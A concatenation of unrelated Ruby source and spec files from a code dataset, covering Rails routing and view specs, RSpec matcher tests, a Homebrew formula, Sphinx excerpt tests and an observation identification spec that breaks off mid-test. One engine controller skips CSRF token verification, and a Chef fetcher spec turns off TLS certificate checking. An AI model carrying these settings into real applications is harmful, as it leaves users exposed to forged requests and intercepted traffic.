| 12.333333 | 32 | 0.837838 |
bf387daf546255ad2aa4aa40a8b24af8d9238e46 | 1,269 | require "rails_helper"
RSpec.describe CustomGalleryLayoutsController, type: :routing do
describe "routing" do
it "routes to #index" do
expect(:get => "/custom_gallery_layouts").to route_to("custom_gallery_layouts#index")
end
it "routes to #new" do
expect(:get => "/custom_gallery_layouts/new").to route_to("custom_gallery_layouts#new")
end
it "routes to #show" do
expect(:get => "/custom_gallery_layouts/1").to route_to("custom_gallery_layouts#show", :id => "1")
end
it "routes to #edit" do
expect(:get => "/custom_gallery_layouts/1/edit").to route_to("custom_gallery_layouts#edit", :id => "1")
end
it "routes to #create" do
expect(:post => "/custom_gallery_layouts").to route_to("custom_gallery_layouts#create")
end
it "routes to #update via PUT" do
expect(:put => "/custom_gallery_layouts/1").to route_to("custom_gallery_layouts#update", :id => "1")
end
it "routes to #update via PATCH" do
expect(:patch => "/custom_gallery_layouts/1").to route_to("custom_gallery_layouts#update", :id => "1")
end
it "routes to #destroy" do
expect(:delete => "/custom_gallery_layouts/1").to route_to("custom_gallery_layouts#destroy", :id => "1")
end
end
end
| 31.725 | 110 | 0.670607 |
622670e8541caccb6a5ef2ba18a9540d95749d45 | 3,140 | ##########################GO-LICENSE-START################################
# Copyright 2014 ThoughtWorks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################GO-LICENSE-END##################################
require File.join(File.dirname(__FILE__), "..", "..", "..", "spec_helper")
describe "admin/package_definitions/new.html.erb" do
it "should render new pkg def page" do
metadata = PackageConfigurations.new
metadata.addConfiguration(PackageConfiguration.new("key1").with(PackageConfiguration::SECURE, false).with(PackageConfiguration::DISPLAY_NAME, "Key 1"))
metadata.addConfiguration(PackageConfiguration.new("key2").with(PackageConfiguration::SECURE, true).with(PackageConfiguration::REQUIRED, false).with(PackageConfiguration::DISPLAY_NAME, "Key 2"))
package_definition = PackageDefinition.new
p1 = ConfigurationProperty.new(ConfigurationKey.new("key1"), ConfigurationValue.new("value1"))
p2 = ConfigurationProperty.new(ConfigurationKey.new("key2"), EncryptedConfigurationValue.new("value2"))
configuration = Configuration.new([p1, p2].to_java(com.thoughtworks.go.domain.config.ConfigurationProperty))
package_definition.setConfiguration(configuration)
assign(:package_configuration, PackageViewModel.new(metadata, package_definition))
render
expect(response.body).to have_selector(".information", :text => "The new package will be available to be used as material in all pipelines. Other admins might be able to edit this package.")
expect(response.body).to have_selector(".new_form_item_block label", :text => "Package Name*")
expect(response.body).to have_selector(".new_form_item_block input[type='text'][name='material[package_definition[name]]']")
expect(response.body).to have_selector(".new_form_item input[type='hidden'][name='material[package_definition[configuration][0][configurationKey][name]]'][value='key1']")
expect(response.body).to have_selector(".new_form_item label", :text => "Key 1*")
expect(response.body).to have_selector(".new_form_item input[type='text'][name='material[package_definition[configuration][0][configurationValue][value]]'][value='value1']")
expect(response.body).to have_selector(".new_form_item input[type='hidden'][name='material[package_definition[configuration][1][configurationKey][name]]'][value='key2']")
expect(response.body).to have_selector(".new_form_item label", :text => "Key 2")
expect(response.body).to have_selector(".new_form_item input[type='password'][name='material[package_definition[configuration][1][configurationValue][value]]'][value='value2']")
end
end | 64.081633 | 198 | 0.735669 |
5da2e202b40dc7b6af85e504fb5af24d5c4abe22 | 12,277 | require File.dirname(__FILE__) + '/../../spec_helper.rb'
module HaveSpecHelper
def create_collection_owner_with(n)
owner = Spec::Expectations::Helper::CollectionOwner.new
(1..n).each do |n|
owner.add_to_collection_with_length_method(n)
owner.add_to_collection_with_size_method(n)
end
owner
end
end
describe "should have(n).items" do
include HaveSpecHelper
it "should pass if target has a collection of items with n members" do
owner = create_collection_owner_with(3)
owner.should have(3).items_in_collection_with_length_method
owner.should have(3).items_in_collection_with_size_method
end
it "should convert :no to 0" do
owner = create_collection_owner_with(0)
owner.should have(:no).items_in_collection_with_length_method
owner.should have(:no).items_in_collection_with_size_method
end
it "should fail if target has a collection of items with < n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have(4).items_in_collection_with_length_method
}.should fail_with("expected 4 items_in_collection_with_length_method, got 3")
lambda {
owner.should have(4).items_in_collection_with_size_method
}.should fail_with("expected 4 items_in_collection_with_size_method, got 3")
end
it "should fail if target has a collection of items with > n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have(2).items_in_collection_with_length_method
}.should fail_with("expected 2 items_in_collection_with_length_method, got 3")
lambda {
owner.should have(2).items_in_collection_with_size_method
}.should fail_with("expected 2 items_in_collection_with_size_method, got 3")
end
end
describe 'should have(1).item when ActiveSupport::Inflector is defined' do
include HaveSpecHelper
before(:each) do
unless defined?(ActiveSupport::Inflector)
@active_support_was_not_defined
module ActiveSupport
class Inflector
def self.pluralize(string)
string.to_s + 's'
end
end
end
end
end
it 'should pluralize the collection name' do
owner = create_collection_owner_with(1)
owner.should have(1).item
end
after(:each) do
if @active_support_was_not_defined
Object.send :remove_const, :ActiveSupport
end
end
end
describe 'should have(1).item when Inflector is defined' do
include HaveSpecHelper
before(:each) do
unless defined?(Inflector)
@inflector_was_not_defined
class Inflector
def self.pluralize(string)
string.to_s + 's'
end
end
end
end
it 'should pluralize the collection name' do
owner = create_collection_owner_with(1)
owner.should have(1).item
end
after(:each) do
if @inflector_was_not_defined
Object.send :remove_const, :Inflector
end
end
end
describe "should have(n).items where result responds to items but returns something other than a collection" do
it "should provide a meaningful error" do
owner = Class.new do
def items
Object.new
end
end.new
lambda do
owner.should have(3).items
end.should raise_error("expected items to be a collection but it does not respond to #length or #size")
end
end
describe "should_not have(n).items" do
include HaveSpecHelper
it "should pass if target has a collection of items with < n members" do
owner = create_collection_owner_with(3)
owner.should_not have(4).items_in_collection_with_length_method
owner.should_not have(4).items_in_collection_with_size_method
end
it "should pass if target has a collection of items with > n members" do
owner = create_collection_owner_with(3)
owner.should_not have(2).items_in_collection_with_length_method
owner.should_not have(2).items_in_collection_with_size_method
end
it "should fail if target has a collection of items with n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should_not have(3).items_in_collection_with_length_method
}.should fail_with("expected target not to have 3 items_in_collection_with_length_method, got 3")
lambda {
owner.should_not have(3).items_in_collection_with_size_method
}.should fail_with("expected target not to have 3 items_in_collection_with_size_method, got 3")
end
end
describe "should have_exactly(n).items" do
include HaveSpecHelper
it "should pass if target has a collection of items with n members" do
owner = create_collection_owner_with(3)
owner.should have_exactly(3).items_in_collection_with_length_method
owner.should have_exactly(3).items_in_collection_with_size_method
end
it "should convert :no to 0" do
owner = create_collection_owner_with(0)
owner.should have_exactly(:no).items_in_collection_with_length_method
owner.should have_exactly(:no).items_in_collection_with_size_method
end
it "should fail if target has a collection of items with < n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have_exactly(4).items_in_collection_with_length_method
}.should fail_with("expected 4 items_in_collection_with_length_method, got 3")
lambda {
owner.should have_exactly(4).items_in_collection_with_size_method
}.should fail_with("expected 4 items_in_collection_with_size_method, got 3")
end
it "should fail if target has a collection of items with > n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have_exactly(2).items_in_collection_with_length_method
}.should fail_with("expected 2 items_in_collection_with_length_method, got 3")
lambda {
owner.should have_exactly(2).items_in_collection_with_size_method
}.should fail_with("expected 2 items_in_collection_with_size_method, got 3")
end
end
describe "should have_at_least(n).items" do
include HaveSpecHelper
it "should pass if target has a collection of items with n members" do
owner = create_collection_owner_with(3)
owner.should have_at_least(3).items_in_collection_with_length_method
owner.should have_at_least(3).items_in_collection_with_size_method
end
it "should pass if target has a collection of items with > n members" do
owner = create_collection_owner_with(3)
owner.should have_at_least(2).items_in_collection_with_length_method
owner.should have_at_least(2).items_in_collection_with_size_method
end
it "should fail if target has a collection of items with < n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have_at_least(4).items_in_collection_with_length_method
}.should fail_with("expected at least 4 items_in_collection_with_length_method, got 3")
lambda {
owner.should have_at_least(4).items_in_collection_with_size_method
}.should fail_with("expected at least 4 items_in_collection_with_size_method, got 3")
end
it "should provide educational negative failure messages" do
#given
owner = create_collection_owner_with(3)
length_matcher = have_at_least(3).items_in_collection_with_length_method
size_matcher = have_at_least(3).items_in_collection_with_size_method
#when
length_matcher.matches?(owner)
size_matcher.matches?(owner)
#then
length_matcher.negative_failure_message.should == <<-EOF
Isn't life confusing enough?
Instead of having to figure out the meaning of this:
should_not have_at_least(3).items_in_collection_with_length_method
We recommend that you use this instead:
should have_at_most(2).items_in_collection_with_length_method
EOF
size_matcher.negative_failure_message.should == <<-EOF
Isn't life confusing enough?
Instead of having to figure out the meaning of this:
should_not have_at_least(3).items_in_collection_with_size_method
We recommend that you use this instead:
should have_at_most(2).items_in_collection_with_size_method
EOF
end
end
describe "should have_at_most(n).items" do
include HaveSpecHelper
it "should pass if target has a collection of items with n members" do
owner = create_collection_owner_with(3)
owner.should have_at_most(3).items_in_collection_with_length_method
owner.should have_at_most(3).items_in_collection_with_size_method
end
it "should fail if target has a collection of items with > n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have_at_most(2).items_in_collection_with_length_method
}.should fail_with("expected at most 2 items_in_collection_with_length_method, got 3")
lambda {
owner.should have_at_most(2).items_in_collection_with_size_method
}.should fail_with("expected at most 2 items_in_collection_with_size_method, got 3")
end
it "should pass if target has a collection of items with < n members" do
owner = create_collection_owner_with(3)
owner.should have_at_most(4).items_in_collection_with_length_method
owner.should have_at_most(4).items_in_collection_with_size_method
end
it "should provide educational negative failure messages" do
#given
owner = create_collection_owner_with(3)
length_matcher = have_at_most(3).items_in_collection_with_length_method
size_matcher = have_at_most(3).items_in_collection_with_size_method
#when
length_matcher.matches?(owner)
size_matcher.matches?(owner)
#then
length_matcher.negative_failure_message.should == <<-EOF
Isn't life confusing enough?
Instead of having to figure out the meaning of this:
should_not have_at_most(3).items_in_collection_with_length_method
We recommend that you use this instead:
should have_at_least(4).items_in_collection_with_length_method
EOF
size_matcher.negative_failure_message.should == <<-EOF
Isn't life confusing enough?
Instead of having to figure out the meaning of this:
should_not have_at_most(3).items_in_collection_with_size_method
We recommend that you use this instead:
should have_at_least(4).items_in_collection_with_size_method
EOF
end
end
describe "have(n).items(args, block)" do
it "should pass args to target" do
target = mock("target")
target.should_receive(:items).with("arg1","arg2").and_return([1,2,3])
target.should have(3).items("arg1","arg2")
end
it "should pass block to target" do
target = mock("target")
block = lambda { 5 }
target.should_receive(:items).with("arg1","arg2", block).and_return([1,2,3])
target.should have(3).items("arg1","arg2", block)
end
end
describe "have(n).items where target IS a collection" do
it "should reference the number of items IN the collection" do
[1,2,3].should have(3).items
end
it "should fail when the number of items IN the collection is not as expected" do
lambda { [1,2,3].should have(7).items }.should fail_with("expected 7 items, got 3")
end
end
describe "have(n).characters where target IS a String" do
it "should pass if the length is correct" do
"this string".should have(11).characters
end
it "should fail if the length is incorrect" do
lambda { "this string".should have(12).characters }.should fail_with("expected 12 characters, got 11")
end
end
describe "have(n).things on an object which is not a collection nor contains one" do
it "should fail" do
lambda { Object.new.should have(2).things }.should raise_error(NoMethodError, /undefined method `things' for #<Object:/)
end
end
describe Spec::Matchers::Have, "for a collection owner that implements #send" do
include HaveSpecHelper
before(:each) do
@collection = Object.new
def @collection.floozles; [1,2] end
def @collection.send(*args); raise "DOH! Library developers shouldn't use #send!" end
end
it "should work in the straightforward case" do
lambda {
@collection.should have(2).floozles
}.should_not raise_error
end
it "should work when doing automatic pluralization" do
lambda {
@collection.should have_at_least(1).floozle
}.should_not raise_error
end
it "should blow up when the owner doesn't respond to that method" do
lambda {
@collection.should have(99).problems
}.should raise_error(NoMethodError, /problems/)
end
end
| 34.485955 | 124 | 0.752627 |
91f5ae5a8e161e07fbea458b86a409d80f3e6cd8 | 1,752 | class GnomeLatex < Formula
desc "LaTeX editor for the GNOME desktop"
homepage "https://wiki.gnome.org/Apps/GNOME-LaTeX"
url "https://download.gnome.org/sources/gnome-latex/3.38/gnome-latex-3.38.0.tar.xz"
sha256 "a82a9fc6f056929ea18d6dffd121e71b2c21768808c86ef1f34da0f86e220d77"
license "GPL-3.0-or-later"
livecheck do
url :stable
end
bottle do
sha256 "f1dbea254436194246d1ea3fcd47a5b08b394efb3a08f48a9a3decd85120ce90" => :catalina
sha256 "c8f5a18378b6a759f3f4614baedf693814b61da0dfecd2f0d8d6ad93bef3fa25" => :mojave
sha256 "7a9d3285f2457fecacc4e0840e32ac940b0e77041dd30839e6a7af7ad55453dd" => :high_sierra
end
depends_on "gobject-introspection" => :build
depends_on "intltool" => :build
depends_on "itstool" => :build
depends_on "pkg-config" => :build
depends_on "vala" => :build
depends_on "adwaita-icon-theme"
depends_on "gnome-themes-standard"
depends_on "gspell"
depends_on "libgee"
depends_on "tepl"
def install
system "./configure", "--disable-schemas-compile",
"--disable-dependency-tracking",
"--disable-silent-rules",
"--disable-dconf-migration",
"--prefix=#{prefix}"
system "make", "install"
end
def post_install
system "#{Formula["glib"].opt_bin}/glib-compile-schemas",
"#{HOMEBREW_PREFIX}/share/glib-2.0/schemas"
system "#{Formula["gtk+3"].opt_bin}/gtk3-update-icon-cache", "-f", "-t",
"#{HOMEBREW_PREFIX}/share/icons/hicolor"
system "#{Formula["gtk+3"].opt_bin}/gtk3-update-icon-cache", "-f", "-t",
"#{HOMEBREW_PREFIX}/share/icons/HighContrast"
end
test do
system "#{bin}/gnome-latex", "--version"
end
end
| 34.352941 | 93 | 0.668379 |
33c50e7052c17d4c8d5226a17eb6e42546545f3f | 282 | module SampleEngine
class ApplicationController < ActionController::Base
include Applogic::ApplicationHelper
skip_before_action :verify_authenticity_token
# protect_from_forgery unless: -> { request.format.json? }
# protect_from_forgery with: :exception
end
end
| 31.333333 | 62 | 0.783688 |
ed5c4f38a2c9e05cdee0fa533cb3634bf1f2d390 | 560 | # typed: true
# frozen_string_literal: true
class Formula
undef shared_library
def shared_library(name, version = nil)
"#{name}.so#{"." unless version.nil?}#{version}"
end
class << self
undef ignore_missing_libraries
def ignore_missing_libraries(*libs)
libraries = libs.flatten
if libraries.any? { |x| !x.is_a?(String) && !x.is_a?(Regexp) }
raise FormulaSpecificationError, "#{__method__} can handle Strings and Regular Expressions only"
end
allowed_missing_libraries.merge(libraries)
end
end
end
| 23.333333 | 104 | 0.689286 |
4ad2314f922a1825418d653622f6d1c0bf60e86e | 399 | # == Schema Information
#
# Table name: users
#
# id :bigint not null, primary key
# username :string not null
# password_digest :string not null
# created_at :datetime not null
# updated_at :datetime not null
#
FactoryBot.define do
factory :user do
username { "Caligula" }
password { "Password" }
end
end
| 23.470588 | 58 | 0.561404 |
62df4ebfec50a0300868379e303ea283d7e3a227 | 150 | class Tagging < ActiveRecord::Base
belongs_to :post, optional: true
belongs_to :tag, optional: true
delegate :name, to: :tag, prefix: true
end
| 21.428571 | 40 | 0.726667 |
87ed6b4ec16990cc1f3f52eb0c184e154cbfd8d9 | 3,198 | # encoding: utf-8
#
# Cookbook Name:: audit
# Spec:: fetcher
#
# Copyright 2016 Chef Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
require_relative '../../../files/default/vendor/chef-server/fetcher'
describe ChefServer::Fetcher do
let(:mynode) { Chef::Node.new }
let(:myprofile) { 'compliance://foobazz' }
let(:profile_hash) {
{
name: 'linux-baseline',
compliance: 'user/linux-baseline',
version: '2.1.0'
}
}
let(:profile_hash_target) {
'/organizations/org/owners/user/compliance/linux-baseline/version/2.1.0/tar'
}
let(:non_profile_url){
'http://127.0.0.1:8889/organizations/org/owners/user/compliance/linux-baseline/version/2.1.0/tar'
}
context 'when target is a string' do
before :each do
allow(Chef).to receive(:node).and_return(mynode)
allow(ChefServer::Fetcher).to receive(:construct_url).and_return(URI(myprofile))
allow(ChefServer::Fetcher).to receive(:chef_server_visibility?).and_return(true)
end
it 'should resolve a target' do
mynode.default['audit']['fetcher'] = nil
res = ChefServer::Fetcher.resolve(myprofile)
expect(res.target).to eq(URI(myprofile))
end
it 'should add /compliance URL prefix if needed' do
mynode.default['audit']['fetcher'] = 'chef-server'
expect(ChefServer::Fetcher.url_prefix).to eq('/compliance')
end
it 'should omit /compliance if not' do
mynode.default['audit']['fetcher'] = nil
expect(ChefServer::Fetcher.url_prefix).to eq('')
end
end
context 'when target is a hash' do
before :each do
Chef::Config[:chef_server_url] = 'http://127.0.0.1:8889/organizations/org'
allow(Chef).to receive(:node).and_return(mynode)
end
it 'should resolve a target with a version' do
mynode.default['audit']['fetcher'] = nil
res = ChefServer::Fetcher.resolve(profile_hash)
expect(res.target.request_uri).to eq(profile_hash_target)
end
end
context 'when profile not found' do
before :each do
Chef::Config[:verify_api_cert] = false
Chef::Config[:ssl_verify_mode] = :verify_none
allow(Chef).to receive(:node).and_return(mynode)
end
it 'should raise error' do
myproc = proc {
config = {
'server_type' => 'automate',
'automate' => {
'ent' => 'my_ent',
'token_type' => 'dctoken',
},
'profile' => ['admin', 'linux-baseline', '2.0']
}
Fetchers::Url.new('non_profile_url', config).send(:http_opts)
}
expect {myproc.call}.to raise_error(RuntimeError)
end
end
end
| 31.663366 | 101 | 0.653533 |
21dfc51b14c9e114974c3e4e6cc75e38acc9ce67 | 2,219 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_06_01
module Models
#
# DNS Proxy Settings in Firewall Policy.
#
class DnsSettings
include MsRestAzure
# @return [Array<String>] List of Custom DNS Servers.
attr_accessor :servers
# @return [Boolean] Enable DNS Proxy on Firewalls attached to the
# Firewall Policy.
attr_accessor :enable_proxy
# @return [Boolean] FQDNs in Network Rules are supported when set to
# true.
attr_accessor :require_proxy_for_network_rules
#
# Mapper for DnsSettings class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'DnsSettings',
type: {
name: 'Composite',
class_name: 'DnsSettings',
model_properties: {
servers: {
client_side_validation: true,
required: false,
serialized_name: 'servers',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
enable_proxy: {
client_side_validation: true,
required: false,
serialized_name: 'enableProxy',
type: {
name: 'Boolean'
}
},
require_proxy_for_network_rules: {
client_side_validation: true,
required: false,
serialized_name: 'requireProxyForNetworkRules',
type: {
name: 'Boolean'
}
}
}
}
}
end
end
end
end
| 28.088608 | 74 | 0.497972 |
03cdf76c0db0dad90f38aa3d85ac0e939df897fd | 147 | class AddUniqueToLeageuser < ActiveRecord::Migration[5.1]
def change
add_index :league_users, [:user_id, :league_id], unique: true
end
end
| 24.5 | 65 | 0.748299 |
0183ab86da19df3ac9adc60e6a7406c2dda4b9c9 | 842 | require 'json'
package = JSON.parse(File.read(File.join(__dir__, '..', 'package.json')))
Pod::Spec.new do |s|
s.name = 'EXCamera'
s.version = package['version']
s.summary = package['description']
s.description = package['description']
s.license = package['license']
s.author = package['author']
s.homepage = package['homepage']
s.platform = :ios, '10.0'
s.source = { :git => "https://github.com/expo/expo.git" }
s.source_files = 'EXCamera/**/*.{h,m}'
s.preserve_paths = 'EXCamera/**/*.{h,m}'
s.requires_arc = true
s.dependency 'UMCore'
s.dependency 'UMFileSystemInterface'
s.dependency 'UMImageLoaderInterface'
s.dependency 'UMPermissionsInterface'
s.dependency 'UMFaceDetectorInterface'
s.dependency 'UMBarCodeScannerInterface'
end
| 30.071429 | 73 | 0.634204 |
e821aa929c3c8caa51573a6036fe487676d3ca39 | 719 | require 'travis/addons/handlers/base'
require 'travis/addons/handlers/task'
module Travis
module Addons
module Handlers
class Slack < Base
include Handlers::Task
EVENTS = 'build:finished'
def handle?
enabled?(:slack) && targets.present? && config.send_on?(:slack, action)
end
def handle
run_task(:slack, payload, targets: targets)
end
def targets
@targets ||= config.values(:slack, :rooms)
end
class Instrument < Addons::Instrument
def notify_completed
publish(targets: handler.targets)
end
end
Instrument.attach_to(self)
end
end
end
end
| 20.542857 | 81 | 0.585535 |
11119ed222d878fb27810873d43465fa6b4c0b2d | 6,280 | # frozen_string_literal: true
require 'spec_helper'
describe "Sphinx Excepts", :live => true do
let(:client) { Riddle::Client.new "localhost", 9313 }
let(:controller) do
controller = Riddle::Controller.new nil, ''
controller.bin_path = Sphinx.new.bin_path
controller
end
it "should highlight a single word multiple times in a document" do
excerpts = client.excerpts(
:index => "people",
:words => "Mary",
:docs => ["Mary, Mary, quite contrary."]
)
if controller.sphinx_version.to_i >= 3
excerpts.should == [
'<span class="match">Mary, Mary</span>, quite contrary.'
]
else
excerpts.should == [
'<span class="match">Mary</span>, <span class="match">Mary</span>, quite contrary.'
]
end
end
it "should use specified word markers" do
excerpts = client.excerpts(
:index => "people",
:words => "Mary",
:docs => ["Mary, Mary, quite contrary."],
:before_match => "<em>",
:after_match => "</em>"
)
if controller.sphinx_version.to_i >= 3
excerpts.should == [
"<em>Mary, Mary</em>, quite contrary."
]
else
excerpts.should == [
"<em>Mary</em>, <em>Mary</em>, quite contrary."
]
end
end
it "should separate matches that are far apart by an ellipsis by default" do
excerpts = client.excerpts(
:index => "people",
:words => "Pat",
:docs => [
<<-SENTENCE
This is a really long sentence written by Pat. It has to be over 256
characters long, between keywords. But what is the keyword? Well, I
can't tell you just yet... wait patiently until we've hit the 256 mark.
It'll take a bit longer than you think. We're probably just hitting the
200 mark at this point. But I think we've now arrived - so I can tell
you what the keyword is. I bet you're really interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: Pat.
SENTENCE
],
:before_match => "<em>",
:after_match => "</em>"
)
case Riddle.loaded_version
when '0.9.9'
excerpts.should == [
<<-SENTENCE
This is a really long sentence written by <em>Pat</em>. It has to be over 256
characters long, between keywords. But what is the … 're really interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: <em>Pat</em>.
SENTENCE
]
when '1.10'
excerpts.should == [" … really long sentence written by <em>Pat</em>. It has to be over … . This keyword, however, is\nnot. It's just my name: <em>Pat</em> … "]
when '2.0.1', '2.1.0'
excerpts.should == [" … really long sentence written by <em>Pat</em>. It has to be over … . It's just my name: <em>Pat</em>.\n"]
else
excerpts.should == [
<<-SENTENCE
This is a really long sentence written by <em>Pat</em>. It has to be over 256
characters long, between keywords. But what is the keyword? … interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: <em>Pat</em>.
SENTENCE
]
end
end
it "should use the provided separator" do
excerpts = client.excerpts(
:index => "people",
:words => "Pat",
:docs => [
<<-SENTENCE
This is a really long sentence written by Pat. It has to be over 256
characters long, between keywords. But what is the keyword? Well, I
can't tell you just yet... wait patiently until we've hit the 256 mark.
It'll take a bit longer than you think. We're probably just hitting the
200 mark at this point. But I think we've now arrived - so I can tell
you what the keyword is. I bet you're really interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: Pat.
SENTENCE
],
:before_match => "<em>",
:after_match => "</em>",
:chunk_separator => " --- "
)
case Riddle.loaded_version
when '0.9.9'
excerpts.should == [
<<-SENTENCE
This is a really long sentence written by <em>Pat</em>. It has to be over 256
characters long, between keywords. But what is the --- 're really interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: <em>Pat</em>.
SENTENCE
]
when '1.10'
excerpts.should == [" --- really long sentence written by <em>Pat</em>. It has to be over --- . This keyword, however, is\nnot. It's just my name: <em>Pat</em> --- "]
when '2.0.1', '2.1.0'
excerpts.should == [" --- really long sentence written by <em>Pat</em>. It has to be over --- . It's just my name: <em>Pat</em>.\n"]
else
excerpts.should == [
<<-SENTENCE
This is a really long sentence written by <em>Pat</em>. It has to be over 256
characters long, between keywords. But what is the keyword? --- interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: <em>Pat</em>.
SENTENCE
]
end
end
it "should return multiple results for multiple documents" do
excerpts = client.excerpts(
:index => "people",
:words => "Mary",
:docs => [
"Mary, Mary, quite contrary.",
"The epithet \"Bloody Mary\" is associated with a number of historical and fictional women, most notably Queen Mary I of England"
],
:before_match => "<em>",
:after_match => "</em>"
)
if controller.sphinx_version.to_f >= 3
excerpts.should == [
"<em>Mary, Mary</em>, quite contrary.",
"The epithet \"Bloody <em>Mary</em>\" is associated with a number of historical and fictional women, most notably Queen <em>Mary</em> I of England"
]
else
excerpts.should == [
"<em>Mary</em>, <em>Mary</em>, quite contrary.",
"The epithet \"Bloody <em>Mary</em>\" is associated with a number of historical and fictional women, most notably Queen <em>Mary</em> I of England"
]
end
end
end
| 37.159763 | 185 | 0.616561 |
b9443b9a8a5f006f01d8dd114588119dc820fcd1 | 1,292 | =begin
#OpenAPI Petstore
#This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
<<<<<<< HEAD
OpenAPI Generator version: 5.0.0-SNAPSHOT
=======
OpenAPI Generator version: 4.1.3-SNAPSHOT
>>>>>>> ooof
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for Petstore::Category
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'Category' do
before do
# run before each test
@instance = Petstore::Category.new
end
after do
# run after each test
end
describe 'test an instance of Category' do
it 'should create an instance of Category' do
expect(@instance).to be_instance_of(Petstore::Category)
end
end
describe 'test attribute "id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "name"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 24.846154 | 157 | 0.715944 |
f7914ccf294ff942c074d184af0f8a1724af0ad4 | 47,346 | require "spec_helper"
describe Identification, "creation" do
describe "without callbacks" do
it "should store the previous observation taxon" do
o = make_research_grade_observation
previous_observation_taxon = o.taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_taxon
end
it "should not create a blank preference when vision is nil" do
i = Identification.make!( vision: nil )
expect( i.stored_preferences ).to be_blank
end
describe "with an inactive taxon" do
it "should replace the taxon with its active equivalent" do
taxon_change = make_taxon_swap
taxon_change.committer = taxon_change.user
taxon_change.commit
expect( taxon_change.input_taxon ).not_to be_is_active
expect( Identification.make!( taxon: taxon_change.input_taxon ).taxon ).to eq taxon_change.output_taxon
end
it "should not replace the taxon if there is no active equivalent" do
inactive_taxon = Taxon.make!( is_active: false )
expect( Identification.make!( taxon: inactive_taxon ).taxon ).to eq inactive_taxon
end
it "should not replace the taxon if there are multiple active equivalents" do
taxon_change = make_taxon_split
taxon_change.committer = taxon_change.user
taxon_change.commit
expect( taxon_change.input_taxon ).not_to be_is_active
expect( Identification.make!( taxon: taxon_change.input_taxon ).taxon ).to eq taxon_change.input_taxon
end
end
end
describe "with callbacks" do
it "should make older identifications not current" do
old_ident = Identification.make!
new_ident = Identification.make!( observation: old_ident.observation, user: old_ident.user )
expect( new_ident ).to be_valid
expect( new_ident ).to be_current
old_ident.reload
expect( old_ident ).not_to be_current
end
it "should not allow 2 current observations per user" do
ident1 = Identification.make!
ident2 = Identification.make!( user: ident1.user, observation: ident1.observation )
ident1.reload
ident2.reload
expect( ident1 ).not_to be_current
expect( ident2 ).to be_current
ident1.update_attributes( current: true )
ident1.reload
ident2.reload
expect( ident1 ).to be_current
expect( ident2 ).not_to be_current
end
it "should add a taxon to its observation if it's the observer's identification" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
identification = Identification.make!(:user => obs.user, :observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to eq identification.taxon.id
end
it "should add a taxon to its observation if it's someone elses identification" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to eq identification.taxon.id
expect(obs.community_taxon).to be_blank
end
it "shouldn't add a taxon to its observation if it's someone elses identification but the observation user rejects community IDs" do
u = User.make!(:prefers_community_taxa => false)
obs = Observation.make!(:user => u)
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).to be_blank
expect(obs.community_taxon).to be_blank
end
it "shouldn't create an ID by the obs owner if someone else adds an ID" do
obs = Observation.make!
expect(obs.taxon_id).to be_blank
expect(obs.identifications.count).to eq 0
identification = Identification.make!(:observation => obs, :taxon => Taxon.make!)
obs.reload
expect(obs.taxon_id).not_to be_blank
expect(obs.identifications.count).to eq 1
end
it "should not modify species_guess to an observation if there's a taxon_id and the taxon_id didn't change" do
obs = Observation.make!
taxon = Taxon.make!
taxon2 = Taxon.make!
identification = Identification.make!(
:user => obs.user,
:observation => obs,
:taxon => taxon
)
obs.reload
user = User.make!
identification = Identification.make!(
:user => user,
:observation => obs,
:taxon => taxon2
)
obs.reload
expect(obs.species_guess).to eq taxon.name
end
it "should add a species_guess to a newly identified observation if the owner identified it and the species_guess was nil" do
